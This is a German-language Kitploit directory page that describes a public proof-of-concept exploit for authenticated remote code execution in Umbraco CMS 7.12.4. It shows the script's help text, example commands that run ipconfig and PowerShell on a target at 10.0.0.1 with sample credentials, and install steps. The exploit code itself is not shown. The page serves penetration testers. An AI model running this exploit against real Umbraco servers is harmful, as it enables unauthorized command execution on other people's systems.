Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Umbraco-RCE — Umbraco CMS 7.12.4 - (Authentifizierte) Remote Code Execution | Kitploit
Tools/GitHubGitHub/noraj/umbraco-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubnoraj/umbraco-rce

Umbraco-RCE

Umbraco CMS 7.12.4 - (Authentifizierte) Remote Code Execution

Repository anzeigen
7940vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

Umbraco RCE-Exploit / PoC

Umbraco CMS 7.12.4 - (authentifizierte) Remote-Codeausführung

[EDB-49488] [PacketStorm] [WLB-2020080012]

Verwendung

root@kitploit:~
$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       username / email
  -p PASS, --password PASS   password
  -i URL, --host URL         root URL
  -c CMD, --command CMD      command
  -a ARGS, --arguments ARGS  arguments

Beispiele:

root@kitploit:~
$ python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'

Voraussetzungen

  • Beautiful Soup
  • Requests

Beispiel für ArchLinux:

root@kitploit:~
pacman -S python-beautifulsoup4 python-requests

Beispiel mit pip:

root@kitploit:~
pip3 install -r requirements.txt

Referenz

Dies ist eine bessere Neufassung von EDB-ID-46153 unter Verwendung von Argumenten (anstelle hartcodierter Werte) und mit stdout-Ausgabe.

Getestet mit python 3.8.

Tool herunterladen